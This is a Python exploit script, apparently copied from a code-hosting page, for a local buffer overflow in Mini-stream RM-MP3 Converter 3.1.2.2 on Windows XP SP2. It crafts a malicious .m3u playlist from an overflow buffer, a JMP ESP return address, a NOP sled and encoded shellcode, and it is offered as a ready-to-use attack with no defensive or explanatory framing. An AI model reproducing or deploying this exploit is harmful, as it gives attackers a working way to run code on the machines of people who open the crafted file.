41 lines
No EOL
1.5 KiB
Python
Executable file
41 lines
No EOL
1.5 KiB
Python
Executable file
# Exploit Title : Mini-stream RM-MP3 Converter<65> V 3.1.2.2 Local Buffer
|
||
OverFlow
|
||
# Author : [SkY-NeT SySteMs]
|
||
# Software Link : [http://mini-stream.net/rm-to-mp3-converter/download/]
|
||
# Version : [3.1.2.2]
|
||
# Tested on : [Xp Sp 2]
|
||
# Category : Local
|
||
# Code : Python
|
||
# Email : [skynet-systems@hotmail.il.co]
|
||
# WebSite : [http://sskynetsystems.blogspot.com/]
|
||
|
||
|
||
# !/usr/bin/python
|
||
|
||
import os,sys
|
||
|
||
header= "http://."
|
||
junk= "\x41" * 17416 # [A]
|
||
ESP = "\x13\x44\x87\x7C" # 7C874413 FFE4 JMP ESP
|
||
NOPS = "\x90" * 16
|
||
|
||
ShellCode =(
|
||
"\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
|
||
"\x0e\xa8\x6e\x77\xce\x83\xee\xfc\xe2\xf4\x54\x86\xfe\xce"
|
||
"\xa8\x6e\x17\x47\x4d\x5f\xa5\xaa\x23\x3c\x47\x45\xfa\x62"
|
||
"\xfc\x9c\xbc\xe5\x05\xe6\xa7\xd9\x3d\xe8\x99\x91\x46\x0e"
|
||
"\x04\x52\x16\xb2\xaa\x42\x57\x0f\x67\x63\x76\x09\x4a\x9e"
|
||
"\x25\x99\x23\x3c\x67\x45\xea\x52\x76\x1e\x23\x2e\x0f\x4b"
|
||
"\x68\x1a\x3d\xcf\x78\x3e\xfc\x86\xb0\xe5\x2f\xee\xa9\xbd"
|
||
"\x94\xf2\xe1\xe5\x43\x45\xa9\xb8\x46\x31\x99\xae\xdb\x0f"
|
||
"\x67\x63\x76\x09\x90\x8e\x02\x3a\xab\x13\x8f\xf5\xd5\x4a"
|
||
"\x02\x2c\xf0\xe5\x2f\xea\xa9\xbd\x11\x45\xa4\x25\xfc\x96"
|
||
"\xb4\x6f\xa4\x45\xac\xe5\x76\x1e\x21\x2a\x53\xea\xf3\x35"
|
||
"\x16\x97\xf2\x3f\x88\x2e\xf0\x31\x2d\x45\xba\x85\xf1\x93"
|
||
"\xc2\x6f\xfa\x4b\x11\x6e\x77\xce\xf8\x06\x46\x45\xc7\xe9"
|
||
"\x88\x1b\x13\x9e\xc2\x6c\xfe\x06\xd1\x5b\x15\xf3\x88\x1b"
|
||
"\x94\x68\x0b\xc4\x28\x95\x97\xbb\xad\xd5\x30\xdd\xda\x01"
|
||
"\x1d\xce\xfb\x91\xa2\xad\xc9\x02\x14\xe0\xcd\x16\x12\xce")
|
||
file = open("test.m3u","w")
|
||
file.write(header+junk+ESP+NOPS+ShellCode)
|
||
file.close() |